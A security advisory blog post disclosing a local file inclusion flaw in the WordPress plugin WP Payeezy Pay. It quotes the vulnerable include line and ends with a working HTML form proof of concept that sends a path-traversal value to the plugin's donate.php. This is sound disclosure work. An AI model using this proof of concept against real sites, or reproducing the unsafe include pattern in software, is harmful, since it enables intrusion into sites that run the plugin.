As we have noted already this week, we have just made a major improvement to our proactive monitoring of changes being made to WordPress plugins to try to catch serious vulnerabilities when they are introduced in to plugins, which built on code we had developed for our Plugin Security Checker, an automated tool you can use to check if plugins you use contain possible security issues. Again it has identified a fairly serious vulnerability, this time a local file inclusion (LFI) vulnerability in the plugin WP Payeezy Pay. This vulnerability has gone unnoticed for over two years.
This vulnerability is yet another good reason to check plugins you use through our Plugin Security Checker since it would already have notified you of this possible issue if you had check the plugin.
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon).
In the plugin’s files /donate.php, /donate-rec.php, /pay.php, and /pay-rec.php the first lines of code are:
$transactionKeyFile = $_POST["x_login"] . '.php'; include $transactionKeyFile;
That will append “.php” to the value of the POST input “x_login” and include it, which is local file inclusion (LFI) vulnerability.
Proof of Concept
The following proof of concept will cause a file named test.php in the root directory of the WordPress installation to be included.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-content/plugins/wp-payeezy-pay/donate.php" method="POST"> <input type="hidden" name="x_login" value="../../../test" /> <input type="submit" value="Submit" /> </form> </body> </html>